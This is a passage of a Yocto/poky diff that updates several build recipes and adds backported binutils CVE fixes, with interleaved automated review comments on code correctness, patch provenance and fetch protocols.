calls may have ++ * references to the link, and they will be dropped when we receive replies. 
*/ ++ + link_free_carrier_maps(link); + + if (link->network) { +@@ -2044,10 +2037,14 @@ void link_drop(Link *link) { + link_drop_from_master(link, link->network->bond); + } + +- log_link_debug(link, "Link removed"); ++ link_unref(set_remove(link->manager->links_requesting_uuid, link)); + + (void) unlink(link->state_file); +- link_detach_from_manager(link); ++ link_clean(link); ++ ++ /* The following must be called at last. */ ++ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); ++ link_unref(link); + } + + static int link_joined(Link *link) { diff --git a/poky/meta/recipes-core/systemd/systemd_244.5.bb b/poky/meta/recipes-core/systemd/systemd_244.5.bb index 7a7eddcd45..b6f5a47d63 100644 --- a/poky/meta/recipes-core/systemd/systemd_244.5.bb +++ b/poky/meta/recipes-core/systemd/systemd_244.5.bb @@ -22,6 +22,12 @@ SRC_URI += "file://touchscreen.rules \ file://0003-implment-systemd-sysv-install-for-OE.patch \ file://CVE-2021-33910.patch \ file://CVE-2020-13529.patch \ + file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \ + file://introduce-ordered_set_clear-free-with-destructor.patch \ + file://network-add-skeleton-of-request-queue.patch \ + file://network-merge-link_drop-and-link_detach_from_manager.patch \ + file://network-also-drop-requests-when-link-enters-linger-state.patch \ + file://network-fix-Link-reference-counter-issue.patch \ " # patches needed by musl @@ -90,6 +96,7 @@ PACKAGECONFIG ??= " \ timesyncd \ utmp \ vconsole \ + wheel-group \ xz \ " 
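Review bot: In network-merge-link_drop-and-link_detach_from_manager.patch, removing the `link->state == LINK_STATE_LINGER` early return makes `link_drop()` non-idempotent, and the patch does not say so anywhere. With the guard gone, a second call on a link that is still referenced reaches `assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link)`, which cannot hold once the entry has already been removed, so the daemon would abort instead of returning. Whether any caller can do that is not visible here, because the callers are outside the hunk. I am only asking for the contract to be written above the function: `/* Must be called exactly once per link; a second call trips the assert_se() below. */`.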
@@ -182,6 +189,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true" PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false" PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind" PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup" +PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false" # Verify keymaps on locale change PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon" PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz" diff --git a/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb index da716674c3..daee5c224b 100644 --- a/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb +++ b/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb @@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "GPLv2+" LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9" -SRC_URI = "git://git.yoctoproject.org/update-rc.d" +SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master" SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/util-linux/util-linux.inc b/poky/meta/recipes-core/util-linux/util-linux.inc index 0e85603d9a..7b780352be 100644 --- a/poky/meta/recipes-core/util-linux/util-linux.inc +++ b/poky/meta/recipes-core/util-linux/util-linux.inc @@ -59,12 +59,13 @@ python util_linux_binpackages () { continue pkg = os.path.basename(os.readlink(file)) - extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1) + extras.setdefault(pkg, []) + extras[pkg].append(file.replace(dvar, '', 1)) pn = d.getVar('PN') for pkg, links in extras.items(): of = d.getVar('FILES_' + pn + '-' + pkg) - links = of + links + links = of + " " + " ".join(sorted(links)) d.setVar('FILES_' + pn + '-' + pkg, links) } 
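Review bot: The two added lines in `util_linux_binpackages` do the work of one, because `dict.setdefault()` already returns the list: `extras.setdefault(pkg, []).append(file.replace(dvar, '', 1))`. Separately, `links = of + " " + " ".join(sorted(links))` still assumes that `d.getVar('FILES_' + pn + '-' + pkg)` returned a string. If that variable can be unset for a package, `(of or "")` would avoid a `TypeError`. The function starts above the hunk, so I cannot see whether that is already guaranteed.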
@@ -94,7 +95,7 @@ EXTRA_OECONF = "\ \ --disable-bfs --disable-chfn-chsh --disable-login \ --disable-makeinstall-chown --disable-minix --disable-newgrp \ - --disable-use-tty-group --disable-vipw \ + --disable-use-tty-group --disable-vipw --disable-raw \ \ --without-udev \ \ diff --git a/poky/meta/recipes-devtools/binutils/binutils-2.34.inc b/poky/meta/recipes-devtools/binutils/binutils-2.34.inc index 3e10279b1d..6104bec591 100644 --- a/poky/meta/recipes-devtools/binutils/binutils-2.34.inc +++ b/poky/meta/recipes-devtools/binutils/binutils-2.34.inc @@ -48,5 +48,7 @@ SRC_URI = "\ file://CVE-2020-16598.patch \ file://CVE-2021-20197.patch \ file://CVE-2021-3487.patch \ + file://CVE-2021-3549.patch \ + file://CVE-2020-16593.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch index 11a8110d40..88cce49e46 100644 --- a/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch +++ b/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch @@ -1,4 +1,4 @@ -From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001 +From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001 From: Khem Raj <raj.khem@gmail.com> Date: Fri, 15 Jan 2016 06:31:09 +0000 Subject: [PATCH] warn for uses of system directories when cross linking @@ -59,8 +59,8 @@ Signed-off-by: Khem Raj <raj.khem@gmail.com> ld/ldfile.c | 17 +++++++++++++++++ ld/ldlex.h | 2 ++ ld/ldmain.c | 2 ++ - ld/lexsup.c | 15 +++++++++++++++ - 9 files changed, 85 insertions(+) + ld/lexsup.c | 16 ++++++++++++++++ + 9 files changed, 86 insertions(+) diff --git a/ld/config.in b/ld/config.in index d93c9b0830..5da2742bea 100644 
@@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644 #undef EXTRA_SHLIB_EXTENSION diff --git a/ld/configure b/ld/configure -index 811134a503..f8c17c19ae 100755 +index f432f4637d..a9da3c115e 100755 --- a/ld/configure +++ b/ld/configure -@@ -826,6 +826,7 @@ with_lib_path +@@ -830,6 +830,7 @@ with_lib_path enable_targets enable_64_bit_bfd with_sysroot @@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755 enable_gold enable_got enable_compressed_debug_sections -@@ -1491,6 +1492,8 @@ Optional Features: +@@ -1495,6 +1496,8 @@ Optional Features: --disable-largefile omit support for large files --enable-targets alternative target configurations --enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes) @@ -97,7 +97,7 @@ index 811134a503..f8c17c19ae 100755 --enable-gold[=ARG] build gold [ARG={default,yes,no}] --enable-got=<type> GOT handling scheme (target, single, negative, multigot) -@@ -15788,6 +15791,19 @@ fi +@@ -16624,6 +16627,19 @@ fi @@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644 /* The initial parser states. */ diff --git a/ld/ldmain.c b/ld/ldmain.c -index da1ad17763..12d0b07d8a 100644 +index c4af10f4e9..95b56b2d2d 100644 --- a/ld/ldmain.c +++ b/ld/ldmain.c -@@ -274,6 +274,8 @@ main (int argc, char **argv) +@@ -273,6 +273,8 @@ main (int argc, char **argv) command_line.warn_mismatch = TRUE; command_line.warn_search_mismatch = TRUE; command_line.check_section_addresses = -1; @@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644 /* We initialize DEMANGLING based on the environment variable COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the diff --git a/ld/lexsup.c b/ld/lexsup.c -index 3d15cc491d..0e8b4f2b7a 100644 +index 3d15cc491d..6478821443 100644 --- a/ld/lexsup.c +++ b/ld/lexsup.c @@ -550,6 +550,14 @@ static const struct ld_option ld_options[] = 
@@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644 }; #define OPTION_COUNT ARRAY_SIZE (ld_options) -@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv) - +@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv) case OPTION_PRINT_MAP_DISCARDED: config.print_map_discarded = TRUE; + break; + + case OPTION_NO_POISON_SYSTEM_DIRECTORIES: + command_line.poison_system_directories = FALSE; @@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644 + + case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES: + command_line.error_poison_system_directories = TRUE; - break; ++ break; } } diff --git a/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch new file mode 100644 index 0000000000..cbe4a50507 --- /dev/null +++ b/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch 
@@ -0,0 +1,204 @@ +From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001 +From: Alan Modra <amodra@gmail.com> +Date: Thu, 16 Apr 2020 17:49:38 +0930 +Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols + + PR 25827 + * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't + strdup(0). + +Upstream-Status: Backport +https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729 +CVE: CVE-2020-16593 +Signed-off-by: Armin Kuster <akuster@mvista.com> + + +Index: git/bfd/dwarf2.c +=================================================================== +--- git.orig/bfd/dwarf2.c ++++ git/bfd/dwarf2.c +@@ -295,12 +295,12 @@ struct comp_unit + /* This data structure holds the information of an abbrev. */ + struct abbrev_info + { +- unsigned int number; /* Number identifying abbrev. */ +- enum dwarf_tag tag; /* DWARF tag. */ +- int has_children; /* Boolean. */ +- unsigned int num_attrs; /* Number of attributes. */ +- struct attr_abbrev *attrs; /* An array of attribute descriptions. */ +- struct abbrev_info *next; /* Next in chain. */ ++ unsigned int number; /* Number identifying abbrev. */ ++ enum dwarf_tag tag; /* DWARF tag. */ ++ bfd_boolean has_children; /* TRUE if the abbrev has children. */ ++ unsigned int num_attrs; /* Number of attributes. */ ++ struct attr_abbrev * attrs; /* An array of attribute descriptions. */ ++ struct abbrev_info * next; /* Next in chain. */ + }; + + struct attr_abbrev +@@ -1487,6 +1487,8 @@ struct varinfo + { + /* Pointer to previous variable in list of all variables */ + struct varinfo *prev_var; ++ /* The offset of the varinfo from the start of the unit. */ ++ bfd_uint64_t unit_offset; + /* Source location file name */ + char *file; + /* Source location line number */ +@@ -1497,7 +1499,7 @@ struct varinfo + /* Where the symbol is defined */ + asection *sec; + /* Is this a stack variable? 
*/ +- unsigned int stack: 1; ++ bfd_boolean stack; + }; + + /* Return TRUE if NEW_LINE should sort after LINE. */ +@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct + struct varinfo* each; + + for (each = unit->variable_table; each; each = each->prev_var) +- if (each->stack == 0 ++ if (! each->stack + && each->file != NULL + && each->name != NULL + && each->addr == addr +@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit, + return TRUE; + } + ++static struct varinfo * ++lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table) ++{ ++ while (table) ++ { ++ if (table->unit_offset == offset) ++ return table; ++ table = table->prev_var; ++ } ++ ++ return NULL; ++} ++ ++ + /* DWARF2 Compilation unit functions. */ + + /* Scan over each die in a comp. unit looking for functions to add +@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit + bfd_vma low_pc = 0; + bfd_vma high_pc = 0; + bfd_boolean high_pc_relative = FALSE; ++ bfd_uint64_t current_offset; ++ ++ current_offset = info_ptr - unit->info_ptr_unit; + + /* PR 17512: file: 9f405d9d. */ + if (info_ptr >= info_ptr_end) +@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit + goto fail; + } + +- var = NULL; + if (abbrev->tag == DW_TAG_subprogram + || abbrev->tag == DW_TAG_entry_point + || abbrev->tag == DW_TAG_inlined_subroutine) + { + bfd_size_type amt = sizeof (struct funcinfo); ++ ++ var = NULL; + func = (struct funcinfo *) bfd_zalloc (abfd, amt); + if (func == NULL) + goto fail; +@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit + if (var == NULL) + goto fail; + var->tag = abbrev->tag; +- var->stack = 1; ++ var->stack = TRUE; + var->prev_var = unit->variable_table; + unit->variable_table = var; ++ var->unit_offset = current_offset; + /* PR 18205: Missing debug information can cause this + var to be attached to an already cached unit. */ + } +- ++ else ++ var = NULL; + /* No inline function in scope at this nesting level. 
*/ + nested_funcs[nesting_level].func = 0; + } +@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit + { + switch (attr.name) + { ++ case DW_AT_specification: ++ if (attr.u.val) ++ { ++ struct varinfo * spec_var; ++ ++ spec_var = lookup_var_by_offset (attr.u.val, ++ unit->variable_table); ++ if (spec_var == NULL) ++ { ++ _bfd_error_handler (_("DWARF error: could not find " ++ "variable specification " ++ "at offset %lx"), ++ (unsigned long) attr.u.val); ++ break; ++ } ++ ++ if (var->name == NULL) ++ var->name = spec_var->name; ++ if (var->file == NULL && spec_var->file != NULL) ++ var->file = strdup (spec_var->file); ++ if (var->line == 0) ++ var->line = spec_var->line; ++ if (var->sec == NULL) ++ var->sec = spec_var->sec; ++ } ++ break; ++ + case DW_AT_name: + if (is_str_attr (attr.form)) + var->name = attr.u.str; +@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit + + case DW_AT_external: + if (attr.u.val != 0) +- var->stack = 0; ++ var->stack = FALSE; + break; + + case DW_AT_location: +@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit + if (attr.u.blk->data != NULL + && *attr.u.blk->data == DW_OP_addr) + { +- var->stack = 0; ++ var->stack = FALSE; + + /* Verify that DW_OP_addr is the only opcode in the + location, in which case the block size will be 1 +@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug + each_var = each_var->prev_var) + { + /* Skip stack vars and vars with no files or names. */ +- if (each_var->stack == 0 ++ if (! each_var->stack + && each_var->file != NULL + && each_var->name != NULL) + /* There is no need to copy name string into hash table as +Index: git/bfd/ChangeLog +=================================================================== +--- git.orig/bfd/ChangeLog ++++ git/bfd/ChangeLog +@@ -1,3 +1,9 @@ ++2020-04-16 Alan Modra <amodra@gmail.com> ++ ++ PR 25827 ++ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't ++ strdup(0). ++ + 2020-02-19 H.J. 
Lu <hongjiu.lu@intel.com> + + PR binutils/25355 diff --git a/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch new file mode 100644 index 0000000000..4391db340a --- /dev/null +++ b/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch 
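Review bot: The body of CVE-2020-16593.patch does more than its header describes. The header cites a single upstream commit whose ChangeLog entry is "Wrap overlong lines. Don't strdup(0).", yet the hunks add a new `lookup_var_by_offset()` helper, a `unit_offset` field in `struct varinfo`, the whole `case DW_AT_specification:` block in `scan_unit_for_symbols` and the `bfd_boolean` conversions. It looks as if a prerequisite upstream change was folded into this file. If so, the header should name that commit as well, so the backport can be audited against upstream and so it is clear whether the unpatched 2.34 tree contained the `strdup (spec_var->file)` call that the CVE is about.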
@@ -0,0 +1,187 @@ +From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001 +From: Alan Modra <amodra@gmail.com> +Date: Thu, 11 Feb 2021 16:56:42 +1030 +Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes + +Adds missing sanity checks for avr device info note, to avoid +potential buffer overflows. Uses bfd_malloc_and_get_section for +sanity checking section size. + + PR 27290 + PR 27293 + PR 27295 + * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting. + Use bfd_malloc_and_get_section. + (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity + check namesz. Return NULL if descsz is too small. Ensure + string table is terminated. + (elf32_avr_get_device_info): Formatting. Add note_size param. + Sanity check note. + (elf32_avr_dump_mem_usage): Adjust to suit. + +Upstream-Status: Backport +CVE: CVE-2021-3549 +Signed-of-by: Armin Kuster <akuster@mvista.com> + +--- + binutils/ChangeLog | 14 +++++++++ + binutils/od-elf32_avr.c | 66 ++++++++++++++++++++++++++--------------- + 2 files changed, 56 insertions(+), 24 deletions(-) + +Index: git/binutils/od-elf32_avr.c +=================================================================== +--- git.orig/binutils/od-elf32_avr.c ++++ git/binutils/od-elf32_avr.c +@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd) + return bfd_get_flavour (abfd) == bfd_target_elf_flavour; + } + +-static char* ++static char * + elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size) + { + asection *section; ++ bfd_byte *contents; + +- if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL) ++ section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo"); ++ if (section == NULL) + return NULL; + +- *size = bfd_section_size (section); +- char *contents = (char *) xmalloc (*size); +- bfd_get_section_contents (abfd, section, contents, 0, *size); ++ if (!bfd_malloc_and_get_section (abfd, section, &contents)) ++ { ++ free (contents); ++ contents = NULL; ++ } + 
+- return contents; ++ *size = bfd_section_size (section); ++ return (char *) contents; + } + +-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents, +- bfd_size_type size) ++static char * ++elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size, ++ bfd_size_type *descsz) + { + Elf_External_Note *xnp = (Elf_External_Note *) contents; + Elf_Internal_Note in; +@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bf + if (in.namesz > contents - in.namedata + size) + return NULL; + ++ if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0) ++ return NULL; ++ + in.descsz = bfd_get_32 (abfd, xnp->descsz); + in.descdata = in.namedata + align_power (in.namesz, 2); +- if (in.descsz != 0 +- && (in.descdata >= contents + size +- || in.descsz > contents - in.descdata + size)) ++ if (in.descsz < 6 * sizeof (uint32_t) ++ || in.descdata >= contents + size ++ || in.descsz > contents - in.descdata + size) + return NULL; + +- if (strcmp (in.namedata, "AVR") != 0) +- return NULL; ++ /* If the note has a string table, ensure it is 0 terminated. 
*/ ++ if (in.descsz > 8 * sizeof (uint32_t)) ++ in.descdata[in.descsz - 1] = 0; + ++ *descsz = in.descsz; + return in.descdata; + } + + static void + elf32_avr_get_device_info (bfd *abfd, char *description, +- deviceinfo *device) ++ bfd_size_type desc_size, deviceinfo *device) + { + if (description == NULL) + return; + + const bfd_size_type memory_sizes = 6; + +- memcpy (device, description, memory_sizes * sizeof(uint32_t)); +- device->name = NULL; ++ memcpy (device, description, memory_sizes * sizeof (uint32_t)); ++ desc_size -= memory_sizes * sizeof (uint32_t); ++ if (desc_size < 8) ++ return; + +- uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes; ++ uint32_t *stroffset_table = (uint32_t *) description + memory_sizes; + bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table); +- char *str_table = ((char *) stroffset_table) + stroffset_table_size; + + /* If the only content is the size itself, there's nothing in the table */ +- if (stroffset_table_size == 4) ++ if (stroffset_table_size < 8) + return; ++ if (desc_size <= stroffset_table_size) ++ return; ++ desc_size -= stroffset_table_size; + + /* First entry is the device name index. 
*/ + uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1); ++ if (device_name_index >= desc_size) ++ return; + ++ char *str_table = (char *) stroffset_table + stroffset_table_size; + device->name = str_table + device_name_index; + } + +@@ -183,7 +201,7 @@ static void + elf32_avr_dump_mem_usage (bfd *abfd) + { + char *description = NULL; +- bfd_size_type note_section_size = 0; ++ bfd_size_type sec_size, desc_size; + + deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL }; + device.name = "Unknown"; +@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd) + bfd_size_type text_usage = 0; + bfd_size_type eeprom_usage = 0; + +- char *contents = elf32_avr_get_note_section_contents (abfd, +- ¬e_section_size); ++ char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size); + + if (contents != NULL) + { +- description = elf32_avr_get_note_desc (abfd, contents, note_section_size); +- elf32_avr_get_device_info (abfd, description, &device); ++ description = elf32_avr_get_note_desc (abfd, contents, sec_size, ++ &desc_size); ++ elf32_avr_get_device_info (abfd, description, desc_size, &device); + } + + elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage, +Index: git/binutils/ChangeLog +=================================================================== +--- git.orig/binutils/ChangeLog ++++ git/binutils/ChangeLog +@@ -1,3 +1,17 @@ ++2021-02-11 Alan Modra <amodra@gmail.com> ++ ++ PR 27290 ++ PR 27293 ++ PR 27295 ++ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting. ++ Use bfd_malloc_and_get_section. ++ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity ++ check namesz. Return NULL if descsz is too small. Ensure ++ string table is terminated. ++ (elf32_avr_get_device_info): Formatting. Add note_size param. ++ Sanity check note. ++ (elf32_avr_dump_mem_usage): Adjust to suit. ++ + 2020-02-01 Nick Clifton <nickc@redhat.com> + + * configure: Regenerate. 
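Review bot: The sign-off trailer in CVE-2021-3549.patch is spelled `Signed-of-by:`, so tooling that looks for `Signed-off-by:` will not find a sign-off on this backport. The `Upstream-Status: Backport` line also gives no commit reference, unlike CVE-2020-16593.patch added next to it, which leaves a reviewer to locate the upstream change from the subject line alone. I would correct the trailer to `Signed-off-by: Armin Kuster <akuster@mvista.com>` and put the upstream commit link in brackets after `Backport`.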
diff --git a/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch b/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch new file mode 100644 index 0000000000..3cb8a3c2a2 --- /dev/null +++ b/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch 
@@ -0,0 +1,68 @@ +From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001 +From: Mingli Yu <mingli.yu@windriver.com> +Date: Fri, 5 Nov 2021 11:18:07 +0800 +Subject: [PATCH] bootchartd.in: make sure only one bootchartd process + +When boot with "init=/sbin/bootchartd" as below: + # runqemu qemux86 bootparams="init=/sbin/bootchartd" + +There are two bootchartd process after boot [1]. + # ps -ef | grep bootchart +root 101 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd +root 103 101 8 03:27 ? 00:00:02 /lib64/bootchart/bootchart-collector 50 +root 106 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd +root 792 106 0 03:27 ? 00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000 +root 794 725 0 03:27 ttyS0 00:00:00 grep bootchart + + # /sbin/bootchartd stop +[bootchart] bootchart-collector started as pid 596 with 2 args: +[bootchart] '--dump' +[bootchart] '/tmp/bootchart.3lXpVDAq3v' +[bootchart] Extracting profile data from pid 204 +[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000' +[bootchart] read 135168 bytes of 135168 +[bootchart] reading 150 chunks (of 150) ... +[bootchart] wrote 18760 kbB +[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit + +But there still one process exist after the above stop command finish. + # ps -ef | grep bootchartd +root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd +root 629 516 0 09:10 ? 00:00:00 grep bootchartd + +Remove the wait_boot which used to wait the boot process to finish to +make sure only one bootchartd process and meanwhile we don't need the +wait_boot logic because we either use "/sbin/bootchartd stop" to stop +the bootchartd manually or install package bootchartd-stop-initscript +altogether with bootchart2 to stop bootchartd automatically after boot. + +After patch: + # ps -ef | grep bootchart + root 101 1 0 03:36 ? 00:00:00 /bin/sh /sbin/bootchartd + root 103 101 6 03:36 ? 
00:00:04 /lib64/bootchart/bootchart-collector 50 + root 596 592 0 03:37 ttyS0 00:00:00 grep bootchart + +[1] https://github.com/xrmx/bootchart/issues/94 + +Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95] + +Signed-off-by: Mingli Yu <mingli.yu@windriver.com> +--- + bootchartd.in | 1 - + 1 file changed, 1 deletion(-) + +diff --git a/bootchartd.in b/bootchartd.in +index 7979ef9..f0e466d 100755 +--- a/bootchartd.in ++++ b/bootchartd.in +@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then + else # running inside the main system + echo "bootchart: no initrd used; starting" + start & +- wait_boot & + # wait a little, until the collector is going, before allowing + # the rest of the system to charge ahead, so we catch it + $USLEEP 250000 +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb b/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb index 6571c19938..66bd897a9a 100644 --- a/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb +++ b/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb @@ -90,10 +90,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)" -SRC_URI = "git://github.com/xrmx/bootchart.git \ +SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \ file://bootchartd_stop.sh \ file://0001-collector-Allocate-space-on-heap-for-chunks.patch \ file://0001-bootchart2-support-usrmerge.patch \ + file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb index 4112cf484f..be61916cc6 100644 --- a/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb +++ b/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb 
@@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev" RDEPENDS_${PN} = "libgcc" SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334" -SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \ +SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \ file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \ " diff --git a/poky/meta/recipes-devtools/build-compare/build-compare_git.bb b/poky/meta/recipes-devtools/build-compare/build-compare_git.bb index b0560cc277..6afa9a0d68 100644 --- a/poky/meta/recipes-devtools/build-compare/build-compare_git.bb +++ b/poky/meta/recipes-devtools/build-compare/build-compare_git.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" -SRC_URI = "git://github.com/openSUSE/build-compare.git \ +SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \ file://Ignore-DWARF-sections.patch;striplevel=1 \ " diff --git a/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb index b2952ee5f5..96a7be6770 100644 --- a/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb +++ b/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb @@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \ file://environment.d-cmake.sh \ file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \ file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \ + file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \ " diff --git a/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch new file mode 100644 index 0000000000..267f586a71 --- /dev/null 
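Review bot: The new btrfs-tools `SRC_URI` adds `;branch=master` but no `;protocol=https`, unlike the GitHub recipes updated in this same commit, so as far as I know bitbake's git fetcher will keep using the unauthenticated, unencrypted git:// transport for git.kernel.org. The `SRCREV` pin in this hunk limits what a tampered transport can deliver, but the fetch can still be observed or blocked in transit, and https is the more consistent choice. I would write the line as `SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master;protocol=https \`. The same applies to the e2fsprogs.inc hunk further down, where `SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master"` also omits the protocol.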
+++ b/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch 
